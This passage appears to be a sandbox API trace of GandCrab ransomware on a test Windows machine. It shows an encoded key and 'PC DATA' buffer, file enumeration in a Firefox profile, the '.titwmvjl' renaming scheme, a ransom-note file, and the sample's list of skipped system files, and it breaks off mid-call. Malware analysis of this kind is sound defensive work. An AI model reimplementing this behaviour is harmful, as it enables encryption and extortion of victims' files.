\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.506] WriteFile (in: hFile=0x2e8, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259db40, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259db40*=0x2162, lpOverlapped=0x0) returned 1 [0084.507] CloseHandle (hObject=0x2e8) returned 1 [0084.507] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.507] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.507] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1d, wMilliseconds=0x337)) [0084.508] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.508] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.508] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.508] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a09d2ca4deb61a.lock") returned 157 [0084.508] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e8 [0084.508] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.509] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.509] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\") returned 133 [0084.509] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*" [0084.509] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*", fInfoLevelId=0x1, lpFindFileData=0x259db5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259db5c) returned 0x5032f8 [0084.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.509] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 1 [0084.510] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.510] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 1 [0084.510] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.510] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.510] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a09d2ca4deb61a.lock" [0084.510] lstrlenW (lpString=".titwmvjl") returned 9 [0084.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a09d2ca4deb61a.lock") returned 157 [0084.510] VirtualAlloc (lpAddress=0x0, dwSize=0x17a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.510] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 166 [0084.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a09d2ca4deb61a.lock") returned 157 [0084.510] lstrlenW (lpString=".lock") returned 5 [0084.510] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.510] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.510] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.511] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.511] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 1 [0084.511] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.511] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.511] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\TITWMVJL-DECRYPT.txt" [0084.511] lstrlenW (lpString=".titwmvjl") returned 9 [0084.511] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\TITWMVJL-DECRYPT.txt") returned 153 [0084.511] VirtualAlloc (lpAddress=0x0, dwSize=0x172, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.511] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 162 [0084.511] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\TITWMVJL-DECRYPT.txt") returned 153 [0084.511] lstrlenW (lpString=".txt") returned 4 [0084.511] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.511] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.511] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.511] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.512] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\TITWMVJL-DECRYPT.txt") returned 153 [0084.512] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\TITWMVJL-DECRYPT.txt") returned 153 [0084.512] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.512] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.512] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.512] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.512] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.512] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.512] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.512] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.512] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.512] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 0 [0084.512] FindClose (in: hFindFile=0x5032f8 | out: hFindFile=0x5032f8) returned 1 [0084.512] CloseHandle (hObject=0x2e8) returned 1 [0084.522] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.522] lstrcmpW (lpString1="2918063365piupsah.sqlite", lpString2=".") returned 1 [0084.522] lstrcmpW (lpString1="2918063365piupsah.sqlite", lpString2="..") returned 1 [0084.522] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="2918063365piupsah.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" [0084.522] lstrlenW (lpString=".titwmvjl") returned 9 [0084.522] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned 133 [0084.522] VirtualAlloc (lpAddress=0x0, dwSize=0x14a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.522] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.titwmvjl") returned 142 [0084.523] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned 133 [0084.523] lstrlenW (lpString=".sqlite") returned 7 [0084.523] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.523] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0084.523] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0084.523] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.523] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned 133 [0084.523] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned 133 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="desktop.ini") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="autorun.inf") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="ntuser.dat") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="iconcache.db") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="bootsect.bak") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", 